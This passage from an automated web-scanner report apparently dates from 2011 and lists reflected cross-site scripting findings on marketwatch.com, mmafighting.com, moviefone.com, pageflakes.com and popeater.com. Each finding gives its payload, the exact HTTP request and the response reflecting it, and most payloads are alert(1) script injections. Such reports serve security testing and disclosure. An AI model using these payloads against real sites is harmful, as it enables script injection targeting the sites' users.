   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8f8'%3bc73e17508a0 was submitted in the REST URL parameter 1. This input was echoed as 1d8f8';c73e17508a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News1d8f8'%3bc73e17508a0/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e95c5'%3b27c78d71732 was submitted in the REST URL parameter 2. This input was echoed as e95c5';27c78d71732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News/Storye95c5'%3b27c78d71732/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News/Storye95c5';27c78d71732/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd126"-alert(1)-"900ecbe9de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd126"-alert(1)-"900ecbe9de5=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
="sportsillustrated.cnn.com,golf.com,fannation.com,sportsfanlive.com,sbnation.com";
s_265.mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.mmafighting.com/?cd126"-alert(1)-"900ecbe9de5=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a508"><script>alert(1)</script>5be8d4657ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a508"><script>alert(1)</script>5be8d4657ca=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999950
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/?6a508"><script>alert(1)</script>5be8d4657ca=1" />
...[SNIP]...

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917bd"><script>alert(1)</script>fd80077afb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:43 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1" />
...[SNIP]...

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f06"-alert(1)-"1a6d26d7f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:44 GMT; path=/
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Article";
s_265.prop9="bsd:19930968";
s_265.prop12="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1";
s_265.prop17="sources-fedor-hendo-fight-could-be-announced-within-24-72-hours";
s_265.prop19="mike-chiappetta";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_cod
...[SNIP]...

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa5f5"><script>alert(1)</script>b5c0de1ee4a was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a" />
...[SNIP]...

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f3c"-alert(1)-"56010fc58d0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
cle";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)do
...[SNIP]...

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae19"><script>alert(1)</script>22fc5ab7398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:29 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:28 GMT; path=/
Content-Type: text/html
Content-Length: 63649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1" />
...[SNIP]...

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c4"-alert(1)-"b34755837c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:30 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:29 GMT; path=/
Content-Type: text/html
Content-Length: 63576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
le";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)
...[SNIP]...

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776d"><script>alert(1)</script>59ea0380dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4776d"><script>alert(1)</script>59ea0380dd4=1 HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:50 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:50 GMT; path=/
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 109015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
<link rel="canonical" href="http://www.moviefone.com/?4776d"><script>alert(1)</script>59ea0380dd4=1"/>
...[SNIP]...

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e187'-alert(1)-'e1daaea1081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx7e187'-alert(1)-'e1daaea1081 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:08 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=00AC81F260BA9A6D5FA9BF2E0A5F34B290777F13E4510D1166BCE4233715DDEC395F69E8143FCA0F905E564697A39C5855E5440A009381B14F7875F0917C6901D8FE5AE37B98CA6E21AAD688744FF342303E26421E926E5FA383B0022C4C45AF471CF31D7A9D60D5B866965A7C42DDCA932D74F3CA2E00A36A7F9949B4A359D81D6DCDB425DF75620502301B6EF64F4D920D4140F5819ED98494DEE07ECC46C9; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspx7e187'-alert(1)-'e1daaea1081&r=634401657685468750';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ee6f</script><script>alert(1)</script>846c743547c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:05 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=09FEB47CFC6C6A3A9CA82F8313EDF2FE88BD584DCED8EA19F6FD5A6B17B4D3C5BFF448D5D70CC1BF473FFFE48C5DBACF66A47473612D3815F39076794F7B12ACF3C8D603D3511D39B29AD35BD13D362716DCA879751F283A6D1327219E1B538164FF4EA0D7830D9FB100B88E01C8BDB5DB7CF2F4D2637593CD2A55D43ECD5000BA7FB7D32E5787A99668E771D32E757968FCD8E1FC9BF5EEEC2F1574D9F16181; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d2e1"-alert(1)-"80c66c7340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6d2e1"-alert(1)-"80c66c7340=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:56 GMT
